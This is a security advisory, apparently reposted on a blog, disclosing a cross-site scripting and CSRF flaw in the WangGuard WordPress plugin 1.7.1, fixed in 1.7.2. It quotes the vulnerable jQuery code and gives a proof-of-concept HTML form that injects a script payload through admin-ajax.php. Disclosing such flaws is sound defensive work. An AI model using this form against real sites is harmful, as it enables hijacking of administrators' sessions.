WordPress WangGuard 1.7.1 Cross Site Scripting

------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0030

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WangGuard WordPress Plugin version
1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WangGuard version 1.7.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_wangguard_wordpress_plugin.html

The issue exists in the file wangguard-admin.php and is caused by the lack of output encoding on the security questions & answers. It should be noted that this functionality is also vulnerable to Cross-Site Request Forgery.

jQuery("#wangguardnewquestionbutton").click(function() {
   jQuery("#wangguardnewquestionerror").hide();
   var wgq = jQuery("#wangguardnewquestion").val();
   var wga = jQuery("#wangguardnewquestionanswer").val();
   if ((wgq=='') || (wga=='')) {
      jQuery("#wangguardnewquestionerror").slideDown();
      return;
   }
   data = {
      action   : 'wangguard_ajax_questionadd',
      q      : wgq,
      a      : wga
   };
   jQuery.post(ajaxurl, data, function(response) {
      if (response!='0') {
         jQuery("#wangguard-question-noquestion").remove();
         var newquest = '<div class="wangguard-question" id="wangguard-question-'+response+'">';
         newquest += '<?php echo addslashes(__("Question", 'wangguard')) ?>: <strong>'+wgq+'</strong><br/>';
         newquest += '<?php echo addslashes(__("Answer", 'wangguard')) ?>: <strong>'+wga+'</strong><br/>';
         newquest += '<a href="javascript:void(0)" rel="'+response+'" class="wangguard-delete-question"><?php echo addslashes(__('delete question', 'wangguard')) ?></a></div>';
         jQuery("#wangguard-new-question-container").append(newquest);
         jQuery("#wangguardnewquestion").val("");
         jQuery("#wangguardnewquestionanswer").val("");
      }
      else if (response=='0') {
         jQuery("#wangguardnewquestionerror").slideDown();
      }
   });
});
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept
<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="action" value="wangguard_ajax_questionadd" />
         <input type="hidden" name="q" value="xss?" />
         <input type="hidden" name="a" value=""><script>alert(1);</script>" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>



------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Acerca de Gustavo

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.